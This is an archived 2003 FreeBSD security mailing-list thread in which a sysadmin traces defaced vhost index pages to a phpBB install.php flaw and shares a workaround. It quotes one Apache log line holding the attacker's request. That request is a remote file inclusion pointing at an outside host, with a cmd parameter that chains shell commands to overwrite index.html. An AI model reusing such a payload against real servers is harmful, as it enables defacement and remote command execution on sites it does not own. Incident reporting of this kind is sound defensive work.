Date: Fri, 7 Nov 2003 13:30:50 +0100 (CET) From: Miha Nedok <mike@voyager.unix-systems.net> To: Marco Trentini <mark@remotelab.org> Cc: security@freebsd.org Subject: Re: hack ? - urgent - false FreeBSD alarm Message-ID: <20031107132650.H19165@voyager.zrcalo.si> In-Reply-To: <3FAB8B3A.7020908@remotelab.org> References: <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org>
next in thread | previous in thread | raw e-mail | index | archive | help
Hi ! It is phpBB related. I found in logs: 200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site- name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" I just did chmod 000 `find -name 'install.php'` for a workaround. Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 . -Miha On Fri, 7 Nov 2003, Marco Trentini wrote: > Date: Fri, 07 Nov 2003 13:08:26 +0100 > From: Marco Trentini <mark@remotelab.org> > To: Miha Nedok <mike@voyager.unix-systems.net> > Cc: security@freebsd.org, stable@freebsd.org > Subject: Re: hack ? - urgent > > Miha Nedok wrote: > > Hi ! > > > > Today I have noticed some modified index.html files on some of our vhosts. > > Is it Apache related ? Does anyone know about this ? > > > > The content is following: > > IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com > > Is your apache version update? > > Maybe IR4DEX knows more about it :) > > -- > Marco Trentini mark@remotelab.org > http://www.remotelab.org/ >
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20031107132650.H19165>